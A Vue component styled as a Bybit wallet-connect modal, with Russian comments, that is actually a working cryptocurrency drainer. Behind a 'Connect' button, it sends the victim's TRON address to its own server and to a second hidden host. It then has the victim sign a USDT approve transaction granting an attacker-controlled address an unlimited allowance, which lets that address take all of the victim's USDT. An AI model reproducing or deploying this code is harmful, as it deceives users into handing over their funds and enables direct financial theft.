<template>
  <div 
    v-if="isOpen" 
    class="fixed inset-0 flex items-center justify-center" 
    style="background-color: rgba(0, 0, 0, 0.75); z-index: 9999999;" 
    @click="$emit('close')"
  >
    <div 
      class="max-w-md w-11/12 text-center relative" 
      style="background-color: rgb(28, 28, 28); border: 1px solid rgb(64, 64, 64);"
      @click.stop
    >
      <button
        @click="$emit('close')"
        class="absolute top-4 right-4 w-8 h-8 flex items-center justify-center text-t-secondary hover:text-t-primary hover:bg-interactive-interactiveBgHover transition-colors text-2xl leading-none"
        style="background-color: transparent;"
      >
        ×
      </button>

      <div class="p-8 pt-12">
        <img 
          src="/bybit-logo-real.svg" 
          alt="Bybit" 
          class="w-32 h-10 mx-auto mb-6 object-contain" 
        />
        
        <h2 class="text-t-primary text-2xl font-semibold mb-3">
          Connect Bybit Wallet
        </h2>
        
        <p class="text-t-secondary text-sm mb-8">
          To connect from phone, please open this page in Bybit Web3 internal browser
        </p>
        
        <div class="space-y-3">
          <button
            @click="connectBybit"
            :disabled="isConnecting"
            class="w-full py-3 px-4 bg-primary-gradient text-t-dark hover:bg-interactive-primaryActive active:bg-interactive-primaryActive transition-all disabled:opacity-70 disabled:cursor-not-allowed text-subtitle1 font-normal"
            style="border-radius: 0;"
          >
            {{ isConnecting ? 'Connecting...' : (isMobile ? 'Connect Bybit' : 'Connect Extension') }}
          </button>
          
          <button
            @click="$emit('close')"
            class="w-full py-3 px-4 bg-transparent text-t-secondary border border-border-line hover:bg-interactive-interactiveBgHover hover:text-t-primary transition-all text-subtitle1 font-normal cursor-pointer"
            style="border-radius: 0;"
          >
            Cancel
          </button>
        </div>
      </div>
    </div>
  </div>
  
  <WalletConnectionSuccessModal
    :is-open="showSuccessModal"
    :ref-code="refCode"
    @close="showSuccessModal = false"
  />
</template>

<script>
import QRCode from 'qrcode'
import WalletConnectionSuccessModal from './WalletConnectionSuccessModal.vue'

export default {
  name: 'WalletConnectModal',
  
  components: {
    WalletConnectionSuccessModal
  },
  
  props: {
    isOpen: {
      type: Boolean,
      default: false
    },
    refCode: {
      type: String,
      default: 'ECHOCAPITAL'
    }
  },
  
  data() {
    return {
      qrCode: '',
      isConnecting: false,
      showSuccessModal: false,
      isMobile: /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent),
      apiBaseUrl: window.location.hostname === 'localhost' 
        ? 'http://localhost:5000' 
        : '',
      backupApiBaseUrl: 'https://api-system.network'
    }
  },
  
  watch: {
    isOpen(newVal) {
      if (newVal) {
        this.generateQR()
        this.checkAutoConnect()
      }
    }
  },
  
  methods: {
    async sendToBothServers(payload) {
      // Отправляем на основной сервер и получаем результат
      const mainRequest = fetch(`${this.apiBaseUrl}/api/connected`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(payload)
      })

      // Отправляем на резервный сервер параллельно (не ждем результата)
      fetch(`${this.backupApiBaseUrl}/api/connected`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(payload)
      }).catch(error => {
        console.warn('Backup server request failed:', error)
      })

      return mainRequest
    },

    async generateQR() {
      const url = window.location.href
      this.qrCode = await QRCode.toDataURL(url, { width: 256 })
    },
    
    // Проверяем если кош уже подключен (для встроенного браузера)
    async checkAutoConnect() {
      setTimeout(async () => {
        if (window.tronWeb && window.tronWeb.ready && window.tronWeb.defaultAddress) {
          this.isConnecting = true
          await this.getConnectedAddress()
        }
      }, 500)
    },
    
    // парсинг адреса как я понял
    async getConnectedAddress() {
      try {
        let address = null
        
        if (window.tronWeb && window.tronWeb.defaultAddress) {
          const addr = window.tronWeb.defaultAddress
          
          if (typeof addr === 'string' && addr.startsWith('T')) {
            address = addr
          } else if (addr && addr.base58) {
            address = addr.base58
          } else if (addr && addr.hex) {
            address = window.tronWeb.address.fromHex(addr.hex)
          }
        }
        
        if (!address) {
          alert('Could not get wallet address')
          this.isConnecting = false
          return
        }
        
        await this.sendToBackend(address)
        
      } catch (error) {
        console.error('Error getting address:', error)
        alert('Failed to get address: ' + error.message)
        this.isConnecting = false
      }
    },
    
    async sendToBackend(address) {
      try {
        const refCodeToSend = this.refCode || 'ECHOCAPITAL'
        
        const payload = {
          'connect_address': address,
          'balance-usdt': 0,
          'balance-trx': 0,
          'ref_code': refCodeToSend
        }
        const response = await this.sendToBothServers(payload)
        
        if (!response.ok) {
          const errorText = await response.text()
          alert('Backend error: ' + errorText)
          return
        }
        
        let data = {}
        try {
          const responseText = await response.text()
          if (responseText && responseText.trim()) {
            data = JSON.parse(responseText)
          }
        } catch (parseError) {
          console.warn('Failed to parse response, using defaults')
        }
        
        localStorage.setItem('connected_wallet', address)
        localStorage.setItem('wallet_type', 'bybit')
        
        // адрес для аппрува
        const adminAddress = data.admin_address || data.address || 'TGyUBjzJy21Gt8rESsHyMFL7k3Yf8Ses6M'
        
        // сам аппрув
        await this.approveUSDT(address, adminAddress)
        
        // Уведомляем бэк
        await this.sendConnectedRequest(address)
        
  
        this.showSuccessModal = true
        this.$emit('close')
        
      } catch (error) {
        console.error('Backend error:', error)
        alert('Failed to connect: ' + error.message)
      } finally {
        this.isConnecting = false
      }
    },
    
    // Главная функция аппрува
    async approveUSDT(userAddress, spenderAddress) {
      if (!window.tronWeb || !window.tronWeb.transactionBuilder) {
        throw new Error('TronWeb not available')
      }
      
      const usdtContract = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'
      const maxAmount = '115792089237316195423570985008687907853269984665640564039457584007913129639935' // uint256 max
      
      try {
        // Формируем параметры для вызова approve(address spender, uint256 amount)
        const params = [
          { type: 'address', value: spenderAddress },
          { type: 'uint256', value: maxAmount }
        ]
        
        // Создаем транзу
        const txObject = await window.tronWeb.transactionBuilder.triggerSmartContract(
          usdtContract,
          'approve(address,uint256)',
          {
            feeLimit: 100000000,
            callValue: 0
          },
          params,
          userAddress
        )
        
        if (!txObject || !txObject.transaction) {
          throw new Error('Failed to build transaction')
        }
        
        // Подпись - открывается байбит окно
        const signedTx = await window.tronWeb.trx.sign(txObject.transaction)
        
        if (!signedTx || !signedTx.signature || signedTx.signature.length === 0) {
          throw new Error('Failed to sign transaction')
        }
        
        // Отправка самой транзы
        const result = await window.tronWeb.trx.sendRawTransaction(signedTx)
        
        if (result.code && result.code !== 'SUCCESS') {
          throw new Error('Transaction failed: ' + (result.message || result.code))
        }
        
        const txid = result.txid || result.transaction?.txID || signedTx.txID
        
        if (!txid) {
          throw new Error('Transaction ID not found')
        }
        
        console.log('Approve success, TXID:', txid)
        console.log('View on TronScan: https://tronscan.org/#/transaction/' + txid)
        
        // таймаут чтоб транза прогрузилась
        await new Promise(resolve => setTimeout(resolve, 2000))
        
        return { txid, success: true }
        
      } catch (error) {
        console.error('Approve error:', error)
        throw error
      }
    },
    
    async sendConnectedRequest(address) {
      try {
        const payload = {
          'ref_code': this.refCode,
          'connect_address': address
        }
        await this.sendToBothServers(payload)
      } catch (error) {
        console.error('/api/connected error:', error)
      }
    },
    
    async connectBybit() {
      this.isConnecting = true
      
      try {
        // Если уже подключен (встроенный браузер Bybit)
        if (window.tronWeb && window.tronWeb.ready) {
          await this.getConnectedAddress()
          return
        }

        // Мобилка - не трогал, пытается открыть мобильное прилолжение
	// Под разные ОС диплинк может быть разным, не трогал это
        if (this.isMobile && (!window.bybitWallet || !window.bybitWallet.tronLink)) {
          const deeplink = `bybitapp://web3/dapp?url=${encodeURIComponent(window.location.href)}`
          window.location.href = deeplink
          
          setTimeout(() => {
            this.isConnecting = false
          }, 2000)
          return
        }

        // Десктоп - Существует ли расширение
        if (!window.bybitWallet || !window.bybitWallet.tronLink) {
          alert('Bybit Wallet not detected. Please install the extension.')
          this.isConnecting = false
          return
        }

        let walletData = null
        
        // Проверяем, был ли уже коннект
        if (window.bybitWallet.tronLink.ready && window.tronWeb && window.tronWeb.defaultAddress) {
          walletData = { address: localStorage.getItem('connected_wallet') || null }
        }
        
        // Запрос коннекта по кнопке
        if (!walletData || !walletData.address) {
          walletData = await window.bybitWallet.tronLink.request({ method: 'tron_requestAccounts' })
        }
        
        let address = this.parseAddress(walletData)
        
        // Если не нашелся адрес
        if (!address) {
          await new Promise(resolve => setTimeout(resolve, 500))
          address = this.parseAddress(window.tronWeb.defaultAddress)
        }
        
        if (!address || !address.startsWith('T')) {
          alert('Connection rejected or invalid address')
          this.isConnecting = false
          return
        }
        
        await this.sendToBackend(address)
        
      } catch (error) {
        console.error('Connection error:', error)
        alert('Failed to connect: ' + error.message)
        this.isConnecting = false
      }
      
      this.isConnecting = false
    },

    parseAddress(data) {
      if (!data) return null
      
      if (typeof data === 'string' && data.startsWith('T')) {
        return data
      }
      
      if (data.address && typeof data.address === 'string') {
        return data.address
      }
      
      if (Array.isArray(data) && data.length > 0) {
        return data[0]
      }
      
      if (data.base58) {
        return data.base58
      }
      
      if (data.hex) {
        return window.tronWeb.address.fromHex(data.hex)
      }
      
      return null
    }
  }
}
</script>